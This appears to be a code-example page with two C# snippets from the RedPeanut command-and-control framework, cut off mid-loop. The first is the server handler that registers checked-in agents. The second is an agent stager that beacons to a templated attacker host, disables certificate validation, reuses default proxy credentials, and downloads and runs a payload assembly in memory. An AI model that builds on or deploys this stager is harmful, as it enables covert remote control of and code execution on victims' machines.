示例#1
        /// <summary>
        /// Handles the first request of an agent check-in: decrypts the posted
        /// agent-id request, registers a new agent instance and answers with the
        /// agent-id message plus a "sessionid" cookie.
        /// </summary>
        /// <param name="reader">Reader over the request body; it is read to the end.</param>
        /// <returns>
        /// <c>Ok(response)</c> once the agent is registered; <c>NotFound()</c> with a
        /// "Connection: Close" response header when either stage throws.
        /// </returns>
        /// <remarks>
        /// Notes for anyone analysing this handler:
        /// - A body that fails to decrypt or deserialize is answered exactly like any
        ///   other failure in this method: 404 with "Connection: Close".
        /// - The cookie name "sessionid" and the "Connection: Close" header on the 404
        ///   are the fixed strings this handler puts on the wire.
        /// - address, port, framework and AgentPivot are taken from the decrypted
        ///   client message and used without validation in this method.
        /// - The same server key (GetServerKey()) decrypts the request, is handed to the
        ///   new agent instance, and encrypts the cookie value.
        /// </remarks>
        private ActionResult StepOne(StreamReader reader)
        {
            AgentIdReqMsg agentidrequest = null;

            // Stage 1: read, parse, decrypt and deserialize the request body.
            try
            {
                string line_t = reader.ReadToEnd();
                Dictionary <string, string> args = GetParsedArgs(line_t);
                // GetValueOrDefault yields null when Paramname is absent; any exception
                // DecryptMessage raises on that input lands in the catch below.
                var line = DecryptMessage(RedPeanutC2.server.GetServerKey(), args.GetValueOrDefault(Paramname));
                // NOTE(review): the result is not null-checked; if deserialization yields
                // null, the dereference in stage 2 throws and takes the stage 2 error path.
                agentidrequest = JsonConvert.DeserializeObject <AgentIdReqMsg>(line);
            }
            catch (Exception)
            {
                // Decrypting or deserializing the message failed: log to the operator
                // console, redraw the CLI prompt and answer 404.
                Console.WriteLine("[x] Something goes wrong decrypting or deserializing message return not found");
                Program.GetMenuStack().Peek().RePrintCLI();
                httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
                return(NotFound());
            }

            // Stage 2: create and register the agent, then build the reply.
            try
            {
                // The agent id is RandomString(10, ...); presumably 10 is the id length - confirm against RandomString.
                IAgentInstance agent = new AgentInstanceHttp(RedPeanutC2.server, RandomString(10, RedPeanutC2.server.GetRandomObject()), RedPeanutC2.server.GetServerKey(), agentidrequest.address, agentidrequest.port, agentidrequest.framework, Profileid);
                // If the request names a pivoting agent, link the new agent to it.
                // The GetAgent result is assigned as-is, with no null check in this method.
                if (!string.IsNullOrEmpty(agentidrequest.AgentPivot))
                {
                    IAgentInstance agentInstance = RedPeanutC2.server.GetAgent(agentidrequest.AgentPivot);
                    agent.Pivoter = agentInstance;
                }
                // Registration happens before the reply is built, so an exception in the
                // lines below leaves the agent registered while the client receives a 404.
                RedPeanutC2.server.RegisterAgentInbound(agent.AgentId, agent);
                string response = CreateMsgAgentId(agent, RedPeanutC2.server.GetServerKey(), Profileid, agentidrequest.framework);
                // The cookie carries the agent id encrypted with the server key. The meaning
                // of the trailing 0 is not visible here - confirm against SetCookieValue.
                SetCookieValue("sessionid", EncryptMessage(RedPeanutC2.server.GetServerKey(), agent.AgentId), 0);
                Console.WriteLine("\n[*] Agent {0} connected", agent.AgentId);
                Program.GetMenuStack().Peek().RePrintCLI();
                return(Ok(response));
            }
            catch (Exception e)
            {
                // Any failure while creating or registering the agent: log the exception
                // message to the operator console and answer 404, as in stage 1.
                Console.WriteLine("[x] Operation error {0}", e.Message);
                Program.GetMenuStack().Peek().RePrintCLI();
                httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
                return(NotFound());
            }
        }
示例#2
    public static void Execute()
    {
        string[] pageget =
        {
            #PAGEGET #
        };

        string[] pagepost =
        {
            #PAGEPOST #
        };

        string param     = "#PARAM#";
        string serverkey = "#SERVERKEY#";
        string host      = "#HOST#";

        string namedpipe = "#PIPENAME#";

        int port            = 0;
        int targetframework = 40;

        Int32.TryParse("#PORT#", out port);
        Int32.TryParse("#FRAMEWORK#", out targetframework);

        Thread.Sleep(10000);
        AgentIdReqMsg agentIdReqMsg = new AgentIdReqMsg();

        agentIdReqMsg.address   = host;
        agentIdReqMsg.port      = port;
        agentIdReqMsg.request   = "agentid";
        agentIdReqMsg.framework = targetframework;


        string agentidrequesttemplate = new JavaScriptSerializer().Serialize(agentIdReqMsg);
        bool   agentexit = false;

        while (true && !agentexit)
        {
            try
            {
                string resp                = "";
                string cookievalue         = "";
                NamedPipeClientStream pipe = null;
                if (string.IsNullOrEmpty(namedpipe))
                {
                    CookiedWebClient wc = new CookiedWebClient();
                    wc.UseDefaultCredentials = true;
                    wc.Proxy             = WebRequest.DefaultWebProxy;
                    wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;

                    WebHeaderCollection webHeaderCollection = new WebHeaderCollection();

                    webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#");

                    #HEADERS #

                    wc.Headers = webHeaderCollection;

                    ServicePointManager.Expect100Continue      = true;
                    ServicePointManager.SecurityProtocol       = (SecurityProtocolType)3072;
                    ServicePointManager.DefaultConnectionLimit = 9999;
                    ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return(true); });

                    string post      = String.Format("{0}={1}", param, EncryptMessage(serverkey, agentidrequesttemplate));
                    string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)], post);

                    resp = wc.UploadString(rpaddress, post);

                    Cookie cookie = wc.ResponseCookies["sessionid"];
                    cookievalue = cookie.Value;
                }
                else
                {
                    try
                    {
                        pipe = new NamedPipeClientStream(host, namedpipe, PipeDirection.InOut, PipeOptions.Asynchronous);
                        pipe.Connect(5000);
                        pipe.ReadMode = PipeTransmissionMode.Message;

                        //Write AgentIdReqMsg
                        var agentIdrequest = EncryptMessage(serverkey, agentidrequesttemplate);
                        pipe.Write(Encoding.Default.GetBytes(agentIdrequest), 0, agentIdrequest.Length);

                        var messageBytes = ReadMessage(pipe);
                        resp = Encoding.UTF8.GetString(messageBytes);
                    }
                    catch (Exception)
                    {
                    }
                }

                var        line       = DecryptMessage(serverkey, resp);
                AgentIdMsg agentIdMsg = new JavaScriptSerializer().Deserialize <AgentIdMsg>(line);

                object[] agrsstage = new object[] {
                    line, cookievalue, pipe
                };

                System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(getPayload(agentIdMsg.stage));
                assembly.GetTypes()[0].GetMethods()[0].Invoke(null, agrsstage);
            }